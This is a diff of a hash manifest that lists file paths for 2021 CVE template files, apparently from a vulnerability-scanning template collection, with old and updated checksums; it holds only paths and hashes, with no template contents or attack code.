-http/cves/2021/CVE-2021-25016.yaml:13eca21533bf781856bc7ecd416bdd8abf804653 +http/cves/2021/CVE-2021-25003.yaml:f85acfb13bf701684d4fe91b81e2217b30c9eb94 +http/cves/2021/CVE-2021-25008.yaml:e2bd2d41b569468489e3745dd421c1a15577402e +http/cves/2021/CVE-2021-25016.yaml:27da4e6df7ca94efe2b8b2cd4ddaa06bf44c8938 http/cves/2021/CVE-2021-25028.yaml:533752557ff220a1bd422d2fb856f1ffb91b9969 -http/cves/2021/CVE-2021-25033.yaml:418b528ea6c7886e28b79f4f7673c158e9216acb -http/cves/2021/CVE-2021-25052.yaml:76f2ab4b9468c2d95ef7165c8e45620ccd38e4fa +http/cves/2021/CVE-2021-25033.yaml:8768311c117a0653e7cc5c8a4cc75d0769cee3c8 +http/cves/2021/CVE-2021-25052.yaml:8dd5740bf3f98413a43c07b460940805e897ad52 http/cves/2021/CVE-2021-25055.yaml:f7703e52995b4903f92459e9ef95df26f9bed1a2 -http/cves/2021/CVE-2021-25063.yaml:821b39a53a40c8ffa4ba2180a1ef6aefa92306d5 -http/cves/2021/CVE-2021-25065.yaml:11f959dceee9ebf18badd3b3a811dea7709bb1b1 -http/cves/2021/CVE-2021-25067.yaml:ed26c9fc4b409093178bf53f71c0269b444a6ed1 +http/cves/2021/CVE-2021-25063.yaml:e0bfef38d39cfee9f885137ec3d3cb0a7565d712 +http/cves/2021/CVE-2021-25065.yaml:8ee7924a64132a0832e11a12581aae746b5da1c6 +http/cves/2021/CVE-2021-25067.yaml:51479ec179abace5e91c9513c221d45abb98ed25 http/cves/2021/CVE-2021-25074.yaml:5a380fe97e9ed2a623bb5d9a76a78a9b9581a041 -http/cves/2021/CVE-2021-25075.yaml:39e68482ba95ae484dbef4d943f3eeeef1d76c1e -http/cves/2021/CVE-2021-25078.yaml:6b6bce6eb2304b9669b02daf33b5beb1d08de327 -http/cves/2021/CVE-2021-25079.yaml:c37bcd8632bac20013d43f089a769bdff04eca2e -http/cves/2021/CVE-2021-25085.yaml:a7de237e23ca9d8f5ed0d68dc839956519456fa8 -http/cves/2021/CVE-2021-25099.yaml:c15223269d9bd03eadab6821d3b09267804d0ed4 +http/cves/2021/CVE-2021-25075.yaml:e47f941254f36267b1c9187f43bee0596e1d31a0 +http/cves/2021/CVE-2021-25078.yaml:d7e219fd39f415ccd30398b2bb8cea67897fa1f3 +http/cves/2021/CVE-2021-25079.yaml:18d97db163ecd42a7224f6e1e1a6a4ac9aeac16f +http/cves/2021/CVE-2021-25085.yaml:2a5c1befc2d27ea7d66485e2b0d10256b6359d91 +http/cves/2021/CVE-2021-25099.yaml:9c14323218b138b43e2196b0d9665aaef686f140 http/cves/2021/CVE-2021-25104.yaml:78f06eb1f70bad226faeeb2acd5b31bb5ee06fa3 -http/cves/2021/CVE-2021-25111.yaml:6b0f40ebc6836b0910f632f9e4a9610a6f506f3e +http/cves/2021/CVE-2021-25111.yaml:ba58695551c73cbccfd585cb8bb325f9558843b6 http/cves/2021/CVE-2021-25112.yaml:863f1f1178f01d7d278802acb2490d230f2c28b5 -http/cves/2021/CVE-2021-25114.yaml:5b5fc3cb6fb7099595c72d0ef22782c7da5cf94b +http/cves/2021/CVE-2021-25114.yaml:de2fc9698799328224086ad54e11e3bf5188bbd8 http/cves/2021/CVE-2021-25118.yaml:bb89b24586f268eeed7c70d7677aa51abb677f32 -http/cves/2021/CVE-2021-25120.yaml:ef1129f3d01121e72cc251f4907dd31121f483f3 -http/cves/2021/CVE-2021-25281.yaml:926d40b41dca38380afe266c4747a494831e1d82 -http/cves/2021/CVE-2021-25296.yaml:747b671ba0e06ff9f7a235ac299f30d4aa099a32 -http/cves/2021/CVE-2021-25297.yaml:52682c3fea52165dc90b59148a0698dce7ec8358 -http/cves/2021/CVE-2021-25298.yaml:0babaec0f4066df9e4caef4eb34b191becf207c8 -http/cves/2021/CVE-2021-25299.yaml:63f77b7b22f20671c58467d9ef2a3826eb2dba51 -http/cves/2021/CVE-2021-25646.yaml:2218d09cd6aee5362f65fb76eee19ff15b8a7b6e -http/cves/2021/CVE-2021-25864.yaml:1ece5f67939fdf5bd24bb6b8b80a4d675100bbf1 -http/cves/2021/CVE-2021-25899.yaml:f84c990490b6e778e06b4abe4673f22c8c954369 -http/cves/2021/CVE-2021-26084.yaml:f13d57a5d654aaabcb6d3548e4ab7e6f4d9c5f4a -http/cves/2021/CVE-2021-26085.yaml:131be1d64bcb55e9a0059917d137c2b2ef5764a8 -http/cves/2021/CVE-2021-26086.yaml:d96d98b05336c9039bdedb473ff20e12255102fa -http/cves/2021/CVE-2021-26247.yaml:daa7279c49fb11ec4e6fcf38895ee3e23cef5d43 +http/cves/2021/CVE-2021-25120.yaml:17afacb43d764c45b4c11ef9151650d2cad6cfe2 +http/cves/2021/CVE-2021-25281.yaml:79d1459249cba40c4206e09d5ef25896ec77d5e5 +http/cves/2021/CVE-2021-25296.yaml:1ea2da93367acd6bef79a47edee35099bb087c1b +http/cves/2021/CVE-2021-25297.yaml:33a348dfb79f066846084ead1356f6f11e048cd4 +http/cves/2021/CVE-2021-25298.yaml:3f131671eb4b758e70cc80c0ca71539fee296f0b +http/cves/2021/CVE-2021-25299.yaml:272a24bd9027674933e7ab964c9d120c8927417b +http/cves/2021/CVE-2021-25646.yaml:38bddfd4767c88b7a9adef79e7dd77f2b6b497ff +http/cves/2021/CVE-2021-25864.yaml:9daaf664447e04b31a2b08aea568666ed5b252c1 +http/cves/2021/CVE-2021-25899.yaml:847672538dfa776dd187401f816389805b41b0f4 +http/cves/2021/CVE-2021-26084.yaml:dc74db623993b3a425c67b349398428b21f4e59d +http/cves/2021/CVE-2021-26085.yaml:12540e7492ab6145ffdda97b28253d0a3a1f3953 +http/cves/2021/CVE-2021-26086.yaml:b35438578547ec4be571d2dbe1f853170d01713f +http/cves/2021/CVE-2021-26247.yaml:380aba2d0b92a8def54f9928094a3ca0882d4e43 http/cves/2021/CVE-2021-26292.yaml:29180065c333be64a12dc3343a26bf290917d6c0 -http/cves/2021/CVE-2021-26294.yaml:15b5b6c816a5b0c96e4862d79c168a57e4a41b58 -http/cves/2021/CVE-2021-26295.yaml:760a664616356d218f9d8b23a5e26619132182a9 +http/cves/2021/CVE-2021-26294.yaml:31dc342ac953702eae9e11db5a4b67ccb1167d1c +http/cves/2021/CVE-2021-26295.yaml:617901b1d282ad4b7baf4cf033bfc80b78bcc89f http/cves/2021/CVE-2021-26475.yaml:287c333e6e6c35e539e84260d37699f19044b24b -http/cves/2021/CVE-2021-26598.yaml:564c72e7ded58474a970f8bb81499d37bec2eb6f -http/cves/2021/CVE-2021-26702.yaml:38b4c6ea7314d91de56621916deab69db896521f -http/cves/2021/CVE-2021-26710.yaml:62c7e47d0b5631d581a26268dc2fac090da415df -http/cves/2021/CVE-2021-26723.yaml:485872f7cfd865bf4f7974965ab17efaf6fdcf78 -http/cves/2021/CVE-2021-26812.yaml:59f135266598da23e8ccbc78b6800509764ef731 -http/cves/2021/CVE-2021-26855.yaml:eebc2b4f2b4bdce6eb1f3939ba31f790416289b4 -http/cves/2021/CVE-2021-27124.yaml:1629ecb945e3672b3d085110841767983165201f +http/cves/2021/CVE-2021-26598.yaml:c8a1911cf29d1503f0f2c7ed84b03eb5554e4cd5 +http/cves/2021/CVE-2021-26702.yaml:eb202f4e53a83dd20ad98f8cbd4158d66c60fed5 +http/cves/2021/CVE-2021-26710.yaml:ef7eb66ac883942d63f1343399937aa1dca8f788 +http/cves/2021/CVE-2021-26723.yaml:00ec7edcbdeaccdac3537404c8d6c7c3f5c01ca4 +http/cves/2021/CVE-2021-26812.yaml:3250f33a0d0ac1fc31b614df064b199abfb9aa84 +http/cves/2021/CVE-2021-26855.yaml:c42466d47d13e63fe225cbfe03e4ea5643fee6d9 +http/cves/2021/CVE-2021-27124.yaml:c5733fec98010b27de00dee5c3b7a7dbc1c5ae3d http/cves/2021/CVE-2021-27132.yaml:fcfd3632c51f9fc6add57cb17f22c786e429bc9f -http/cves/2021/CVE-2021-27309.yaml:a3a9b515c775670ff42193b413141bdb9a093baf +http/cves/2021/CVE-2021-27309.yaml:c0a0e164a992636c4d75f5c5a48093382a4a0861 http/cves/2021/CVE-2021-27310.yaml:6c130175ed546ffc7a70969fe956b16deee4f64d http/cves/2021/CVE-2021-27314.yaml:5a5d404050557c21d88703fe905484af36df4d1c -http/cves/2021/CVE-2021-27315.yaml:74654fa6664463c75851f08e5fd40fa498c1e16e +http/cves/2021/CVE-2021-27315.yaml:a35e2b21d64664b1dc1b051b9aebe2c0d8bbea9a http/cves/2021/CVE-2021-27316.yaml:75fe1ce09716aeebd01d4e93523b46c13ac35002 -http/cves/2021/CVE-2021-27319.yaml:4ac703375c9f54452dae10e45521a9e9e275d3bf -http/cves/2021/CVE-2021-27320.yaml:8892536ec8bde5ba1d2a36bafdca53d74a970dc6 -http/cves/2021/CVE-2021-27330.yaml:7c15e8c428cf23f33e9417b848aa1548bb097aba -http/cves/2021/CVE-2021-27358.yaml:8a9b766705b30e318f54311f1ac6ce99298e6c1d -http/cves/2021/CVE-2021-27519.yaml:1e478365ef619cb1325a309573643277445efaec -http/cves/2021/CVE-2021-27520.yaml:460e5969818aa1cf1a07bd3688404dca0ae3ebf0 -http/cves/2021/CVE-2021-27561.yaml:48b8e25de3c4b67ab3c08074a6392f8b79b56d21 -http/cves/2021/CVE-2021-27651.yaml:fb07d45f4dea3a695c3ba1cf1b17282568f3e11d -http/cves/2021/CVE-2021-27670.yaml:ccc4db0cad2f1e302de60259feaf399494056e85 +http/cves/2021/CVE-2021-27319.yaml:b785025398590a56aed4ddf2ded77eb580bf4c39 +http/cves/2021/CVE-2021-27320.yaml:4316c2de8def2bfa92ed880cfcee4a994e548b67 +http/cves/2021/CVE-2021-27330.yaml:b3d6336e6b5b9df123cebe0ea046817c7e2b25cc +http/cves/2021/CVE-2021-27358.yaml:94fdaf01a21c8691d6b0cada2300997502f97da4 +http/cves/2021/CVE-2021-27519.yaml:9987f825d5eef281ad03167be9471e2ff5bd9d33 +http/cves/2021/CVE-2021-27520.yaml:71740db07b842e556ff0e3502301f823a213012d +http/cves/2021/CVE-2021-27561.yaml:4466d02ccd5225c530894a23f7271a4e52927715 +http/cves/2021/CVE-2021-27651.yaml:d4495c5c75916c88ebcfc6963aedcc1ac85c0c68 +http/cves/2021/CVE-2021-27670.yaml:b6418fe5edaaaecb5a4ec9a22c7eed0ccd501832 http/cves/2021/CVE-2021-27748.yaml:1dc51db3b3d3be24e2be6387448b7a662531edb5 -http/cves/2021/CVE-2021-27850.yaml:6d39edaca13ab611f58c51ec72e93ef55b05dfa5 -http/cves/2021/CVE-2021-27905.yaml:d83ca42e2d53248b98aff534b7ba88f52858d1e8 -http/cves/2021/CVE-2021-27909.yaml:788c3fd40aa42d55bb56f89c662a03cb92649b7f -http/cves/2021/CVE-2021-27931.yaml:8dacc9bb81db5a5aeb0dffde8a034619108d38c8 +http/cves/2021/CVE-2021-27850.yaml:64ecfed4708d7c2dc35acd4db916dbc2eb32ad74 +http/cves/2021/CVE-2021-27905.yaml:e55b787c321dac5c1fe1733431f805aa1b9a0c45 +http/cves/2021/CVE-2021-27909.yaml:b06dd842f67a5a6312ab0cf479ab4839b1005187 +http/cves/2021/CVE-2021-27931.yaml:52bce3b2966d95aaf19fbfc72760e749b05c862c http/cves/2021/CVE-2021-28073.yaml:b69885510093cff31b667b35c1004583ec9fbbf2 http/cves/2021/CVE-2021-28149.yaml:0a69b168f8c598056a57c29b2c4225737cb83bf0 -http/cves/2021/CVE-2021-28150.yaml:5c44f0523781a0f4b2d9fb25b5c1e9060126b8df +http/cves/2021/CVE-2021-28150.yaml:a0787ef21b7d8d7d5f984f378d7bd37f54bdaeaa http/cves/2021/CVE-2021-28151.yaml:e126ac73a0c4ae22fe04e5a1374c2fc480bc1367 -http/cves/2021/CVE-2021-28164.yaml:c495e9844b37c21638f8ce764c2f65fd67ffd47d -http/cves/2021/CVE-2021-28169.yaml:2a2b83e42d9a0d4016f953c9a03cf66ca77395fd -http/cves/2021/CVE-2021-28377.yaml:a14614a7091a6dae30ad0d7c77c00899100a0981 -http/cves/2021/CVE-2021-28419.yaml:81ea7bd96652f972ce9b5e1cfbd77f7d160ed9c6 +http/cves/2021/CVE-2021-28164.yaml:5dd4e3ae65a8c4ccc087ee45dc6c1039457fe244 +http/cves/2021/CVE-2021-28169.yaml:37da3586f6f8475da6f63596d5cbf578af370502 +http/cves/2021/CVE-2021-28377.yaml:0c0306f01abbec5444d522510bc897cea44339c7 +http/cves/2021/CVE-2021-28419.yaml:06dd2715d496bb243207a231a5c63d7b1de18d6f http/cves/2021/CVE-2021-28854.yaml:dd2007f9a927a86fa6765c9534a1259eb3c46f86 http/cves/2021/CVE-2021-28918.yaml:20422a3d75001b729c00e4a3c90e9ed033fb4349 -http/cves/2021/CVE-2021-28937.yaml:647e7448f2a3b3555298e351de5a7dba0d958a09 -http/cves/2021/CVE-2021-29006.yaml:3f6d3f064325f17fe590a38bbae392526e5ed5a9 -http/cves/2021/CVE-2021-29156.yaml:5814b1158661cceb1a262e7f34ff5040980e9d73 -http/cves/2021/CVE-2021-29200.yaml:e485da0092f467bdd1adb2cf7dfc544c61ac1f0f -http/cves/2021/CVE-2021-29203.yaml:b4b3c9702a7ba11de6bafd405b269b144634be84 +http/cves/2021/CVE-2021-28937.yaml:bd90f9666ffbbd6f1911cf7d3e92bcd7b10db395 +http/cves/2021/CVE-2021-29006.yaml:46596666b900962b362a68a1ae4665002fc8489f +http/cves/2021/CVE-2021-29156.yaml:dd426a2d85c02bdd6820151a503b813b623ffc6e +http/cves/2021/CVE-2021-29200.yaml:2eacb123c53c6291e6f98e85ade682001d2127aa +http/cves/2021/CVE-2021-29203.yaml:097c5d57566606d4908f10ef8f557c2dbadc1684 http/cves/2021/CVE-2021-29441.yaml:437a19e0d1b5d31dea8ff40a951b703eb77e4136 -http/cves/2021/CVE-2021-29442.yaml:b2fd9c5467a913f80015e20ab5c1ff6fb5ea1950 -http/cves/2021/CVE-2021-29484.yaml:63aa82a7a51ab985cdf379e46d6b1598ec9a0683 -http/cves/2021/CVE-2021-29490.yaml:3a04e9e1ab6011b372335b1e7a7db8adcba0d00c +http/cves/2021/CVE-2021-29442.yaml:818804dfe3d7008e6c615567ed874e1f3b45d2d9 +http/cves/2021/CVE-2021-29484.yaml:7be70cf51ae6211451faffc18a9dcca574c5a24b +http/cves/2021/CVE-2021-29490.yaml:da69b66fb55d67c32fb427d0c225e726f3ca7fbe http/cves/2021/CVE-2021-29505.yaml:499c17d9f306975010f29ed644e4c232907941b4 -http/cves/2021/CVE-2021-29622.yaml:4075eeaddf6bfc0e38ea03fdb817d651b72bf711 -http/cves/2021/CVE-2021-29625.yaml:f29c485158f863b71003a1d8b54b3564ccdf9baa -http/cves/2021/CVE-2021-3002.yaml:b17285115d6e7ca777078b433959aafc7fc49766 -http/cves/2021/CVE-2021-30049.yaml:10dfed32823f675d7a8200ad9f639d326269d9d9 -http/cves/2021/CVE-2021-30128.yaml:c2064c93ae1cfdae0666a78a041e01f454965dca -http/cves/2021/CVE-2021-30134.yaml:6365aa91075632c43c56867d35f0d5495d0aaa6a -http/cves/2021/CVE-2021-30151.yaml:a5823328a2e51b6e25209da97cfd262cd11028fb -http/cves/2021/CVE-2021-3017.yaml:e6968f807056416f2f6f95ce0b753c7da8f7bdf3 -http/cves/2021/CVE-2021-30175.yaml:3da6712428c20d2f6ed6992dc6c774347f8c6850 -http/cves/2021/CVE-2021-3019.yaml:919abc666f5c4da2d07307d5ad1a6afc76d8403b -http/cves/2021/CVE-2021-30213.yaml:17b564617db8472f9190ed3de84f2385dbcf5ad2 -http/cves/2021/CVE-2021-30461.yaml:24724b1de4aaf6be6836a99107b049804c1017b1 -http/cves/2021/CVE-2021-30497.yaml:558ffe9dd0dc5369a560ffaa5983f5ffc4ae0bbe -http/cves/2021/CVE-2021-3110.yaml:80f9e4876bf76ae9e6916913973ae364fe732628 -http/cves/2021/CVE-2021-31195.yaml:318357499b1e4df75f0af6df36aba00d2f1c9411 +http/cves/2021/CVE-2021-29622.yaml:fac9f650cecf2b0249ff5db89704d89ac1ad2de3 +http/cves/2021/CVE-2021-29625.yaml:65852bbaa7ef79ac96435c4b5a55762e6df9558a +http/cves/2021/CVE-2021-3002.yaml:689d379864c76a630eb3ad129fb379c2021a926e +http/cves/2021/CVE-2021-30049.yaml:fc44294f44537b7426855643a448c2a138a2bb5c +http/cves/2021/CVE-2021-30128.yaml:b119c7a5cd0558a5d6ed6379e72d9a6dbd66ec8a +http/cves/2021/CVE-2021-30134.yaml:dfca391ce0dc56cbf534854f4bbac3b95a451754 +http/cves/2021/CVE-2021-30151.yaml:648be73d0bdb77e56474e68dfed691f58b291e36 +http/cves/2021/CVE-2021-3017.yaml:804614220a942d8b22c7cfa4f2ec1d43b3b8b8d7 +http/cves/2021/CVE-2021-30175.yaml:42ecbdc2f4dcbdc81e94bcfd6d31af0c0f011c78 +http/cves/2021/CVE-2021-3019.yaml:f07c8e5cc5ec9b7ae1b7cb57a35a7cb17281bacf +http/cves/2021/CVE-2021-30213.yaml:d78b5aba3bec5186aac1eadbcab658a2ab1d4fdb +http/cves/2021/CVE-2021-30461.yaml:91ea30f242dac2f693091298b160762933c080b3 +http/cves/2021/CVE-2021-30497.yaml:475c233386c5ba0e18abcfdc0e304105c6a8a2e7 +http/cves/2021/CVE-2021-3110.yaml:70a3a1b4da525f3cc12c8e320828c1de7787d711 +http/cves/2021/CVE-2021-31195.yaml:4bd37744f62b3d1bd7b9a9fcab8c18d2f1f6e4ea http/cves/2021/CVE-2021-31249.yaml:514a2d8097e60e15ab5d5dea64714e8293db2b3a -http/cves/2021/CVE-2021-31250.yaml:609cc147261d689c2abfb6f60576bec2d1b390c1 +http/cves/2021/CVE-2021-31250.yaml:867864379eb75c9a81f7e05fb7b7919af58517e4 http/cves/2021/CVE-2021-3129.yaml:58cf44f43956214483492f7c4f1664bd05036422 -http/cves/2021/CVE-2021-31537.yaml:3557e0e6c8c4258523542676e9c54cc4a864d01f -http/cves/2021/CVE-2021-31581.yaml:89e09bf6b0e67ec62e8545a13524c1af524cbad9 -http/cves/2021/CVE-2021-31589.yaml:7f4a33c1d82dbb7a2077ff41bed406c37eb16e2c -http/cves/2021/CVE-2021-31602.yaml:50a07c3242e430b8e02640df76722583bc2129b5 -http/cves/2021/CVE-2021-31682.yaml:80f81046e36750f26a3c45ebf7ed8e1f2ac20061 -http/cves/2021/CVE-2021-31755.yaml:ef66cafb9c455883d62a8674c444e6b657794052 -http/cves/2021/CVE-2021-31805.yaml:ee69e2d4f237e0c6eba34f2eab26551732340203 +http/cves/2021/CVE-2021-31537.yaml:ef4891cdc66df98a86793a3189fb01e160c98d7e +http/cves/2021/CVE-2021-31581.yaml:e5c18e16322cbd210f5fe06933959260e2cf08fa +http/cves/2021/CVE-2021-31589.yaml:b4cbfd0f2f1068028e2d5e0d49ef01cabf0f5d4d +http/cves/2021/CVE-2021-31602.yaml:1f94619245a151b2328fd592c9d96be8186812d9 +http/cves/2021/CVE-2021-31682.yaml:f3b62f2169e6269939a64015733c3648afe5fa90 +http/cves/2021/CVE-2021-31755.yaml:abd8d7371154a95f163a1536f988b90e708600c3 +http/cves/2021/CVE-2021-31805.yaml:3e4cd0ea3477154f2935b058433b16e67ea7da8b http/cves/2021/CVE-2021-31856.yaml:02f2f826362c783a35fa70eee7772941eaddcde1 -http/cves/2021/CVE-2021-31862.yaml:688f0289637d1e40b8a70c6fb14d7b4ad60232fb +http/cves/2021/CVE-2021-31862.yaml:89473ea0b944e76fe6be8e9b83b2d2663ff6d8b3 http/cves/2021/CVE-2021-32030.yaml:c0a4636874282c087cf32c8e177c73dd9f771710 http/cves/2021/CVE-2021-32172.yaml:8fdebff02b3d16ee1e990072fd53e435b1e8dac7 -http/cves/2021/CVE-2021-3223.yaml:36219448b19905a79b4884f01b29465c01ef619a +http/cves/2021/CVE-2021-3223.yaml:e1896f30e0499ef12ccb5fc03b892c9c87f2444b http/cves/2021/CVE-2021-32305.yaml:70d9951aa4e2a64bd18be918d669dde6a9a18cf2 -http/cves/2021/CVE-2021-32618.yaml:5c9dccd91eba0c070f7db1399560ccdc8a307650 +http/cves/2021/CVE-2021-32618.yaml:4874c4ff111966f4a1cad76dc222b1cbd967d88a http/cves/2021/CVE-2021-32682.yaml:31e0b4b5fdcf1ff4fb51b0f653ecfbce0ec0d9d2 http/cves/2021/CVE-2021-32789.yaml:03bf6b93c36208174b66afb4a806a53868ed54de http/cves/2021/CVE-2021-32819.yaml:380a8078feba8f1bc4e50b118a121f74d6cf25f8 -http/cves/2021/CVE-2021-32820.yaml:57d867e0ffe0387cf8d39de537bc19f8de4a5ab4 -http/cves/2021/CVE-2021-32853.yaml:21fa7610aab9ab5f27e3e6c9e4546f7f6880d5d4 +http/cves/2021/CVE-2021-32820.yaml:b75870f452e12388c569089adbaafea642e0aad9 +http/cves/2021/CVE-2021-32853.yaml:8b24fa2ce857eaa46e5aaa1f51ff391f839370d0 http/cves/2021/CVE-2021-3293.yaml:36aba5cc9aad3ae4e19921a3f84cdd1db53ae512 -http/cves/2021/CVE-2021-3297.yaml:9d24a96563e4acab938b8f53508908f726e456ce -http/cves/2021/CVE-2021-33044.yaml:25f1d31729eb0d28735576ac71970f91a579f5e6 -http/cves/2021/CVE-2021-33221.yaml:fcf463a7a41b0beb75c543b35f6698c1703754c4 -http/cves/2021/CVE-2021-33357.yaml:cdb2be78509d3d61d0b585b0a4207af47cb45f89 +http/cves/2021/CVE-2021-3297.yaml:77ace535639edee109758e3bd19687248d82829a +http/cves/2021/CVE-2021-33044.yaml:f267244e663d85f45c06e5e6fa8f572c8777c177 +http/cves/2021/CVE-2021-33221.yaml:9c58ce321de4f629f5d1762a2e1832c46dcccca4 +http/cves/2021/CVE-2021-33357.yaml:24596aa2d592229a59bacaa77d7ec280fdf036ef http/cves/2021/CVE-2021-33544.yaml:fce70ffeea8d3bdb07f5f487869da319c7a95fa3 http/cves/2021/CVE-2021-33564.yaml:a82110635a2629a0c81dc6b2984959c690d0c393 -http/cves/2021/CVE-2021-33690.yaml:87e4d72e0fad030fd83158fd1cd59f03ee052899 -http/cves/2021/CVE-2021-3374.yaml:0a10b39966d1393de6d2c5d5ccc8f7556e4dd2e4 -http/cves/2021/CVE-2021-3377.yaml:bd5e20bb66fd84b14fbcd1dbf118056c01fa2c56 +http/cves/2021/CVE-2021-33690.yaml:444266a7432bb0b56c6148250e0bd5e043c7d4c0 +http/cves/2021/CVE-2021-3374.yaml:d519f7466444215eb8fa36b51b72e8589eaad100 +http/cves/2021/CVE-2021-3377.yaml:9bf0ad577fa9166abc78af4d61e6e441f41b2519 http/cves/2021/CVE-2021-3378.yaml:a842331f8c0924d398887c3ec42f8fbac970903c -http/cves/2021/CVE-2021-33807.yaml:a61fda186347244feb571f28a9ef0372dda5bcee -http/cves/2021/CVE-2021-33851.yaml:f2cced7480d09d4f3f70ebb9667a5cf0395c40bc -http/cves/2021/CVE-2021-33904.yaml:7c9ab65dea3207c5d4d7ec0f0389e54ddd83041e +http/cves/2021/CVE-2021-33807.yaml:d7504eb3a116bcc711e13dd11194491baad20ca6 +http/cves/2021/CVE-2021-33851.yaml:d37fb55018b8fb0d2a84a1be6c07984c49cf8c21 +http/cves/2021/CVE-2021-33904.yaml:89ef9a57ce230eaba15109352d5a2754f31d0a0c http/cves/2021/CVE-2021-34370.yaml:a6bb7f8f166cf8c32e0d5413eb96c76d3fb3f6d1 -http/cves/2021/CVE-2021-34429.yaml:72395ef74692d870bca3d7c36f10597ecf1399fd -http/cves/2021/CVE-2021-34473.yaml:a6fba055485ffd19a582007be3cd8ff1bbff72a8 +http/cves/2021/CVE-2021-34429.yaml:8a584bf70eb9bdfd8daec086e96871d74f66e397 +http/cves/2021/CVE-2021-34473.yaml:73ac890892773d6afb2a31fea09c8c245a393b2d http/cves/2021/CVE-2021-34621.yaml:56f9dc43ee199038f49466b0b480aa7a964ac31f -http/cves/2021/CVE-2021-34640.yaml:61caec8b6d0c93bdbe75e426edb560512c56fd42 -http/cves/2021/CVE-2021-34643.yaml:80ca06ba1c1cf0d691768d9f883c9e28fec4edc3 -http/cves/2021/CVE-2021-34805.yaml:225835eb377bfb001f9338527aaa371b464c7a8f -http/cves/2021/CVE-2021-35250.yaml:56665ee2ea1b6d9177011331cead60250b5c3ad2 -http/cves/2021/CVE-2021-35265.yaml:edea4e848e1cea0fc24c3d245a151bda41ddf95f +http/cves/2021/CVE-2021-34640.yaml:c4684c43b933c18e653b46096cbda6fb725fced4 +http/cves/2021/CVE-2021-34643.yaml:c4eafb5f2cac85929b4960a12274dafdc30fd58f +http/cves/2021/CVE-2021-34805.yaml:aaa2167c9c4e34633b7c9d8ba32e96031ce341d1 +http/cves/2021/CVE-2021-35250.yaml:289efeaa556b5e04135b24cec42fefac1a7dd4da +http/cves/2021/CVE-2021-35265.yaml:b139ff21ddc649a5f3b9315e156c543cfeeed592 http/cves/2021/CVE-2021-35323.yaml:d147477c5193b9fb927fdf34cf3903193413b232 -http/cves/2021/CVE-2021-35336.yaml:6caae867947908ef1442faf0b50f91f399626a27 +http/cves/2021/CVE-2021-35336.yaml:a73c5bd76374c5db032ec1b03a3a833dbad07feb http/cves/2021/CVE-2021-35380.yaml:166a86250742c082425c822f746a97c97e9db37c -http/cves/2021/CVE-2021-35395.yaml:4cc3ed2c5194767f8ca75ce92ba4dab526dc94c9 -http/cves/2021/CVE-2021-35464.yaml:e9e28056833f62649ffb18df6f4b85dbcc14c223 -http/cves/2021/CVE-2021-35488.yaml:dd54cb49aea94f5ef4450cfcbaa82faaa2b134d7 -http/cves/2021/CVE-2021-35587.yaml:d4afb690b5cf0918770a6ddfb4ab4bb2553c6775 -http/cves/2021/CVE-2021-3577.yaml:0a56135b1cbb7f3b10130898fd11a85f526751f4 -http/cves/2021/CVE-2021-36260.yaml:7ba20097cfe679697162daf4e4a38b512d0fba96 -http/cves/2021/CVE-2021-36356.yaml:11649c7f6aefe25455c99ea49cec69e162690899 -http/cves/2021/CVE-2021-36380.yaml:adf247b74181860c6c19fd249c8f064372c4ef46 -http/cves/2021/CVE-2021-36450.yaml:6fcb0b245765fb039a8203789dab679b428176a9 -http/cves/2021/CVE-2021-3654.yaml:a88d24822a0f499bfa14e006237babd366825c4d -http/cves/2021/CVE-2021-36580.yaml:edd21d1beb5fc1b3647b3f3dab0195e72f58b4b6 -http/cves/2021/CVE-2021-36748.yaml:fa9e34fc74625f7e72ea3230becaabb93eac54ff +http/cves/2021/CVE-2021-35395.yaml:d18dfdd20fc2124b6f6156bcc999c57407f34d33 +http/cves/2021/CVE-2021-35464.yaml:6efe7248948e30d881018d084229350824d1e3b5 +http/cves/2021/CVE-2021-35488.yaml:4dfcf3f693de2670eda1a5a3adc9f85a572eaee7 +http/cves/2021/CVE-2021-35587.yaml:79a2242ab3dc3488d90ba7787e73a2ed6827a81b +http/cves/2021/CVE-2021-3577.yaml:f363338587c0c4eb79c5eb65cb54b01f0e62ccee +http/cves/2021/CVE-2021-36260.yaml:64ff273b05ae0ed2d4a2f909ef25fef624192c72 +http/cves/2021/CVE-2021-36356.yaml:ff2b6d790262793cd6ad07b08632309c64ac0ddd +http/cves/2021/CVE-2021-36380.yaml:dc4250aaa3237110ffeb1b75dd8f00990ac7a4cd +http/cves/2021/CVE-2021-36450.yaml:969296d7e07a4431bb7eae6c5d6621144a217f9b +http/cves/2021/CVE-2021-3654.yaml:87e0613f4f6a62e23538b469f523b3e6357b1458 +http/cves/2021/CVE-2021-36580.yaml:967749bd57647c75bb0d380c9c31b82ed905b038 +http/cves/2021/CVE-2021-36748.yaml:113ef42346ebce2bd76538669dcdfeb52509d713 http/cves/2021/CVE-2021-36749.yaml:3b0a7b9a9d14edf603248b938e61d7db03f084a7 http/cves/2021/CVE-2021-36873.yaml:cbff75f79e65e669b04b3b174ef61d586109cc6b http/cves/2021/CVE-2021-37216.yaml:79f6fb2bedd55cef9c44cd8a90e800cbd1714802 -http/cves/2021/CVE-2021-37304.yaml:89e1a775a31a9c61d14b23d0f1bc0b11d8b8a812 -http/cves/2021/CVE-2021-37305.yaml:b1769dd81f876b2322c8ba43750029e933150eec -http/cves/2021/CVE-2021-37416.yaml:5ca48602ee0adc67ab7d08ce6b6afce5cb28e84e +http/cves/2021/CVE-2021-37304.yaml:04fc8faf0d2365b7f1cbfcfc76f79c1c0c9e89cb +http/cves/2021/CVE-2021-37305.yaml:1e87bb921d860939bc5cacdc7a7c7993a9846a9f +http/cves/2021/CVE-2021-37416.yaml:d0889caca645e0a65b5791c8fe1975ffdddd8e9b http/cves/2021/CVE-2021-37538.yaml:10b588b6c384ac1f6391bcca0f0cf5d2ecf3aca4 -http/cves/2021/CVE-2021-37573.yaml:5a4623024051f0460741bb0f43cf018eabe7083a -http/cves/2021/CVE-2021-37580.yaml:005d8b2e74cd0be9a1f0c4ce410c98d08a8dc351 -http/cves/2021/CVE-2021-37589.yaml:70ab465b5d1ae2126062e892ffbc91fcd81036a6 -http/cves/2021/CVE-2021-37704.yaml:addffcf9d763ea0a368d137d23172b5c89e16a02 -http/cves/2021/CVE-2021-37833.yaml:6c38bf5800c5fa8bf0ccbd4f8258b8a1258f465f +http/cves/2021/CVE-2021-37573.yaml:bedcd4e63e8593038e1536ae1ff0ba4400d98c74 +http/cves/2021/CVE-2021-37580.yaml:f5dc24043216b36560265de80278583728faf8b2 +http/cves/2021/CVE-2021-37589.yaml:d69d7cccc5a283cba577bf63d83b2d1943385f75 +http/cves/2021/CVE-2021-37704.yaml:6d7a10739f7c4d531b01d13b3cd734068f58fdfc 